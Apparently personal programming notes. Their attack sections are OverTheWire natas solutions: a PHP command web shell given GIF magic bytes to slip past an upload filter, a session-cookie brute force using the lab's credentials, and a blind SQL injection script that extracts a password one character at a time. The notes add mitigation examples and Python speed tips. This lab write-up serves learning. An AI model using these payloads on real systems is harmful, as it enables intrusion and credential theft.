Add magic numbers to the beginning of the file

```python
# Python 2. Prepend the GIF signature bytes so an upload filter that only
# inspects the first bytes of the file classifies it as an image.
fh = open('magic_numbers_gif.php', 'w')
fh.write('\x47\x49\x46\x38' + '<?php passthru($_GET["cmd"]); ?>')  # GIF8<?php passthru($_GET["cmd"]); ?>
fh.close()
```
## Requests

```python
# Python 2. natas19: the PHPSESSID is hex("<n>-admin") with a small counter n,
# so the admin session is found by iterating n.
import requests
from requests.auth import HTTPBasicAuth

for x in range(1, 640):
    sessionid = str(str(x) + "-admin").encode("hex")
    print "Trying: " + sessionid + ": " + str(x)
    r = requests.get("http://natas19.natas.labs.overthewire.org/",
                     auth=HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'),
                     cookies={"PHPSESSID": str(sessionid)})
    print r
    if "You are an admin." in r.text:
        print "FOUND: " + str(x)
        print r.text
        break
```
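The loop above works because the session id encodes both a small counter and the role the application trusts. As an added example (not from these notes), the snippet below decodes a cookie in that format to show what it leaks, and contrasts it with a server-side session store where the cookie is an opaque random token and the role is looked up on the server. The sample id and the `SessionStore` class are constructed for this example.

```python
import secrets
from typing import Dict


def decode_predictable_session(sessionid_hex: str) -> str:
    """The natas19 cookie is hex(b"<counter>-<role>"); decoding it shows both."""
    return bytes.fromhex(sessionid_hex).decode("ascii")


class SessionStore:
    """Role lives on the server; the cookie is only a random lookup key."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Dict[str, str]] = {}

    def create(self, username: str, role: str) -> str:
        token = secrets.token_hex(16)  # 128 bits from the OS CSPRNG
        self._sessions[token] = {"user": username, "role": role}
        return token

    def is_admin(self, token: str) -> bool:
        entry = self._sessions.get(token)
        return entry is not None and entry["role"] == "admin"


# Constructed sample cookie in the page's format: hex("111-admin").
SAMPLE_COOKIE = "3131312d61646d696e"

if __name__ == "__main__":
    print(decode_predictable_session(SAMPLE_COOKIE))  # 111-admin
    store = SessionStore()
    admin_token = store.create("natas19", "admin")
    print(len(admin_token), store.is_admin(admin_token))  # 32 True
    print(store.is_admin(SAMPLE_COOKIE))  # False: unknown token, role ignored
```

With 640 candidate counters and one role word the original id space is a few hundred guesses; a 16-byte random token gives no structure to enumerate, and because the role never leaves the server, forging a token that decodes to "admin" buys nothing.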
Brute force attack

```python
# Python 2. natas15: blind boolean SQL injection. The page answers
# "This user exists." when the injected condition is true, so the natas16
# password is recovered one character at a time.
import urllib
import urllib2
from urllib2 import HTTPError

cookie = '__cfduid=d6d468235c70649795d3603f9283975561442874989;'
url = 'http://natas15.natas.labs.overthewire.org/index.php'
referrer = 'natas15.natas.labs.overthewire.org'
authorization = 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='
Chars = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r',
         's','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L',
         'M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5',
         '6','7','8','9']
password = ""
# loop through possible length of password
for i in range(1, 33):
    print "%d out of 32" % (i)
    # loop through possible chars
    for j in range(0, len(Chars)):
        # COLLATE latin1_general_cs forces a case-sensitive comparison in MySQL
        sqli = 'natas16" AND LEFT(password, %d) COLLATE latin1_general_cs = "%s' % (i, password + Chars[j])
        values = {'username': sqli}
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        req.add_header('Cookie', cookie)
        req.add_header('Referer', referrer)  # the HTTP header name is spelled "Referer"
        req.add_header('Authorization', authorization)
        the_page = ""  # so the check below is safe when the request fails
        try:
            response = urllib2.urlopen(req)
            the_page = response.read()
            # print the_page
        except HTTPError, e:
            print e.reason
        if "This user exists." in the_page:
            password += Chars[j]
            print password
            break
```
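The extraction above only works because the username is pasted into the query string. As an added example (not from these notes), the snippet below runs the same "does this user exist" check two ways against an in-memory SQLite table: once with string-built SQL, which turns the yes/no answer into an oracle on the password column, and once with a bound parameter, where the same input is just a username that matches nobody. The schema, password and probe string are constructed for this example; the probe mirrors the notes' payload using SQLite's `substr()` in place of MySQL's `LEFT()` (SQLite compares strings case-sensitively by default, so no COLLATE is needed).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed table standing in for the natas15 users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('natas16', 'Wq7xExample')")  # made-up password
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    # String-built SQL: the username can close the quote and append conditions.
    sql = "SELECT 1 FROM users WHERE username='%s'" % username
    return conn.execute(sql).fetchone() is not None


def user_exists_fixed(conn: sqlite3.Connection, username: str) -> bool:
    # Bound parameter: the driver sends the username as data, never as SQL.
    sql = "SELECT 1 FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchone() is not None


def probe(prefix: str) -> str:
    """Constructed probe in the shape of the notes' payload, for SQLite."""
    return "natas16' AND substr(password, 1, %d) = '%s" % (len(prefix), prefix)


if __name__ == "__main__":
    conn = make_db()
    print(user_exists_vulnerable(conn, probe("W")))  # True: oracle leaks first char
    print(user_exists_vulnerable(conn, probe("X")))  # False
    print(user_exists_fixed(conn, probe("W")))       # False: no user with that name
```

The fixed version needs no input filtering or quote escaping; the query text is fixed before any user data arrives, which is why parameterized queries are the mitigation rather than blocklisting `AND`, `LEFT` or quotes.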
Optimize for speed

Membership testing O(1)
Use a dictionary or set instead of a list or tuple. Searching a sequence is O(n):
a in b

String concatenation – join()
Use .join(), which is O(n); building a string with + or += is O(n ** 2).
''.join(seq)

Iterator form over list form
Iterators:
– xrange
– itertools.imap
– generator expressions
– dict.iteritems
List forms:
– range
– map
– list comprehensions
– dict.items
Iterator forms are more memory friendly and more scalable.

Builtin datatypes, extension modules and builtin functions
Use builtin assets whenever possible, as they are optimized.
Sorting
Custom sort ordering is best performed with Py2.4’s key= option or with the traditional decorate-sort-undecorate technique. Both approaches call the key function just once per element. In contrast, sort’s cmp= option is called many times per element during a sort. For example, sort(key=str.lower) is faster than sort(cmp=lambda a,b: cmp(a.lower(), b.lower())).
Local variables
Local variables are accessed more quickly than global variables, builtins and attribute lookups.
List comprehensions
List comprehensions run a bit faster than equivalent for-loops.
while 1 / while True
The interpreter optimizes “while 1” to a single jump. In contrast, “while True” takes several more steps. While the latter is preferred for clarity, time-critical code should use the first form.
Multiple assignments
Multiple assignment is slower than individual assignment. For example “x,y=a,b” is slower than “x=a; y=b”. However, multiple assignment is faster for variable swaps. For example, “x,y=y,x” is faster than “t=x; x=y; y=t”.
Chained comparisons
Chained comparisons are faster than using the “and” operator.
Write “x < y < z” instead of “x < y and y < z”.
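As an added example (not part of these notes), the snippet below times the membership, concatenation and sorting tips with `timeit` on Python 3, where `range()`, `map()` and `dict.items()` are already the lazy forms that `xrange`, `imap` and `iteritems` were in Python 2, and where `sort(cmp=...)` no longer exists and must be emulated with `functools.cmp_to_key`. The sizes are constructed for this example.

```python
import timeit
from functools import cmp_to_key
from typing import List, Tuple


def membership_times(n: int = 10_000, probes: int = 1_000) -> Tuple[float, float]:
    """Return (list_seconds, set_seconds) for the same probes; probes sit near
    the end of the list, the worst case for a linear scan."""
    seq = list(range(n))
    s = set(seq)
    targets = list(range(n - probes, n))
    t_list = timeit.timeit(lambda: [x in seq for x in targets], number=1)
    t_set = timeit.timeit(lambda: [x in s for x in targets], number=1)
    return t_list, t_set


def concat_plus(parts: List[str]) -> str:
    out = ""
    for p in parts:
        out += p  # in general each += may copy the growing string
    return out


def concat_join(parts: List[str]) -> str:
    return "".join(parts)  # one pass, one allocation


def concat_times(count: int = 50_000) -> Tuple[float, float]:
    parts = [str(i) for i in range(count)]
    return (timeit.timeit(lambda: concat_plus(parts), number=3),
            timeit.timeit(lambda: concat_join(parts), number=3))


def sort_key(words: List[str]) -> List[str]:
    return sorted(words, key=str.lower)  # key function called once per element


def sort_cmp(words: List[str]) -> List[str]:
    # Comparison function called O(n log n) times, lowering both strings each call.
    def cmp(a: str, b: str) -> int:
        return (a.lower() > b.lower()) - (a.lower() < b.lower())
    return sorted(words, key=cmp_to_key(cmp))


def sum_multiples_of_seven(n: int) -> int:
    # A generator over range(n) never materialises a list of n ints.
    return sum(x for x in range(n) if x % 7 == 0)


if __name__ == "__main__":
    print("membership list/set:", membership_times())
    print("concat +=/join:", concat_times())
    words = ["banana", "Apple", "cherry", "apple"]
    print(sort_key(words), sort_cmp(words))
    print(sum_multiples_of_seven(100))  # 735
```

One caveat on the concatenation numbers: CPython resizes a `str` in place when `+=` is applied to a string nothing else references, so the quadratic cost often does not show up in this micro-benchmark; it does appear when the string is shared or on other interpreters, which is why `join()` remains the safe default.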